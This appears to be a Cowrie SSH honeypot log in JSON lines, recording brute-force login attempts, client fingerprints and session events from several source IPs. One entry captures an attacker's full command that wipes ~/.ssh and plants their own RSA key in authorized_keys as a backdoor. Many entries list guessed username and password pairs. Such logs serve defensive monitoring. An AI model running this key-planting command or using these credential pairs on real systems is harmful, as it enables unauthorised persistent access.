{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:04:11.392148Z","src_ip":"134.199.225.42","session":"5b8e8aed7084"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:04:11.810215Z","src_ip":"134.199.225.42","session":"5b8e8aed7084"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:04:11.810899Z","src_ip":"134.199.225.42","session":"5b8e8aed7084"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:04:11.968825Z","src_ip":"134.199.225.42","session":"5b8e8aed7084"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:04:11.969728Z","src_ip":"134.199.225.42","session":"5b8e8aed7084"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":41716,"dst_ip":"1.2.3.4","dst_port":22,"session":"5391d3010f7e","protocol":"ssh","message":"New connection: 134.199.225.42:41716 (1.2.3.4:22) [session: 5391d3010f7e]","sensor":"my-vps","timestamp":"2025-08-26T06:04:12.128684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:04:12.129670Z","src_ip":"134.199.225.42","session":"5391d3010f7e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:04:12.288976Z","src_ip":"134.199.225.42","session":"5391d3010f7e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:04:12.968097Z","src_ip":"134.199.225.42","session":"5391d3010f7e"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:04:14.130060Z","src_ip":"134.199.225.42","session":"5391d3010f7e"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":41726,"dst_ip":"1.2.3.4","dst_port":22,"session":"eae19147d973","protocol":"ssh","message":"New connection: 134.199.225.42:41726 (1.2.3.4:22) [session: eae19147d973]","sensor":"my-vps","timestamp":"2025-08-26T06:04:14.289900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:04:14.290811Z","src_ip":"134.199.225.42","session":"eae19147d973"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:04:14.450800Z","src_ip":"134.199.225.42","session":"eae19147d973"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:04:15.130811Z","src_ip":"134.199.225.42","session":"eae19147d973"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:04:15.291106Z","src_ip":"134.199.225.42","session":"5b8e8aed7084"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:04:15.292791Z","src_ip":"134.199.225.42","session":"eae19147d973"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":34166,"dst_ip":"1.2.3.4","dst_port":22,"session":"455ab1198a87","protocol":"ssh","message":"New connection: 93.123.109.181:34166 (1.2.3.4:22) [session: 455ab1198a87]","sensor":"my-vps","timestamp":"2025-08-26T06:04:51.530431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:04:51.531452Z","src_ip":"93.123.109.181","session":"455ab1198a87"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T06:04:51.551275Z","src_ip":"93.123.109.181","session":"455ab1198a87"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-26T06:04:51.621186Z","src_ip":"93.123.109.181","session":"455ab1198a87"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:04:52.643919Z","src_ip":"93.123.109.181","session":"455ab1198a87"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":53660,"dst_ip":"1.2.3.4","dst_port":22,"session":"51019b5d4b95","protocol":"ssh","message":"New connection: 134.199.225.42:53660 (1.2.3.4:22) [session: 51019b5d4b95]","sensor":"my-vps","timestamp":"2025-08-26T06:05:11.558012Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:05:11.558760Z","src_ip":"134.199.225.42","session":"51019b5d4b95"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:05:11.718452Z","src_ip":"134.199.225.42","session":"51019b5d4b95"}
{"eventid":"cowrie.login.failed","username":"sc","password":"123","message":"login attempt [sc/123] failed","sensor":"my-vps","timestamp":"2025-08-26T06:05:12.397307Z","src_ip":"134.199.225.42","session":"51019b5d4b95"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:05:13.559273Z","src_ip":"134.199.225.42","session":"51019b5d4b95"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":48198,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e43e95017a2","protocol":"ssh","message":"New connection: 45.88.8.215:48198 (1.2.3.4:22) [session: 2e43e95017a2]","sensor":"my-vps","timestamp":"2025-08-26T06:05:28.807672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:05:29.250861Z","src_ip":"45.88.8.215","session":"2e43e95017a2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T06:05:29.252445Z","src_ip":"45.88.8.215","session":"2e43e95017a2"}
{"eventid":"cowrie.login.success","username":"root","password":"Kunsh@123","message":"login attempt [root/Kunsh@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:05:31.933138Z","src_ip":"45.88.8.215","session":"2e43e95017a2"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:05:32.331993Z","src_ip":"45.88.8.215","session":"2e43e95017a2"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53490,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd59c06e0495","protocol":"ssh","message":"New connection: 217.72.205.35:53490 (1.2.3.4:22) [session: dd59c06e0495]","sensor":"my-vps","timestamp":"2025-08-26T06:05:44.493285Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:05:44.494348Z","src_ip":"217.72.205.35","session":"dd59c06e0495"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":50040,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d8d5951e250","protocol":"ssh","message":"New connection: 134.199.225.42:50040 (1.2.3.4:22) [session: 3d8d5951e250]","sensor":"my-vps","timestamp":"2025-08-26T06:06:13.742575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:06:13.743603Z","src_ip":"134.199.225.42","session":"3d8d5951e250"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:06:13.903623Z","src_ip":"134.199.225.42","session":"3d8d5951e250"}
{"eventid":"cowrie.login.failed","username":"log","password":"log123","message":"login attempt [log/log123] failed","sensor":"my-vps","timestamp":"2025-08-26T06:06:14.583137Z","src_ip":"134.199.225.42","session":"3d8d5951e250"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:06:15.745240Z","src_ip":"134.199.225.42","session":"3d8d5951e250"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33338,"dst_ip":"1.2.3.4","dst_port":22,"session":"98b0cffb3ff4","protocol":"ssh","message":"New connection: 212.227.235.229:33338 (1.2.3.4:22) [session: 98b0cffb3ff4]","sensor":"my-vps","timestamp":"2025-08-26T06:06:31.052448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:06:31.647241Z","src_ip":"212.227.235.229","session":"98b0cffb3ff4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T06:06:31.647901Z","src_ip":"212.227.235.229","session":"98b0cffb3ff4"}
{"eventid":"cowrie.login.success","username":"root","password":"575757","message":"login attempt [root/575757] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:06:36.530013Z","src_ip":"212.227.235.229","session":"98b0cffb3ff4"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:06:37.508273Z","src_ip":"212.227.235.229","session":"98b0cffb3ff4"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":34034,"dst_ip":"1.2.3.4","dst_port":22,"session":"926b63bd0388","protocol":"ssh","message":"New connection: 134.199.225.42:34034 (1.2.3.4:22) [session: 926b63bd0388]","sensor":"my-vps","timestamp":"2025-08-26T06:07:15.732187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:07:15.733048Z","src_ip":"134.199.225.42","session":"926b63bd0388"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:07:15.891693Z","src_ip":"134.199.225.42","session":"926b63bd0388"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle@2023","message":"login attempt [oracle/oracle@2023] failed","sensor":"my-vps","timestamp":"2025-08-26T06:07:16.565943Z","src_ip":"134.199.225.42","session":"926b63bd0388"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:07:17.725944Z","src_ip":"134.199.225.42","session":"926b63bd0388"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":52942,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b1ab96bcabf","protocol":"ssh","message":"New connection: 134.199.225.42:52942 (1.2.3.4:22) [session: 9b1ab96bcabf]","sensor":"my-vps","timestamp":"2025-08-26T06:08:17.182855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:08:17.184512Z","src_ip":"134.199.225.42","session":"9b1ab96bcabf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 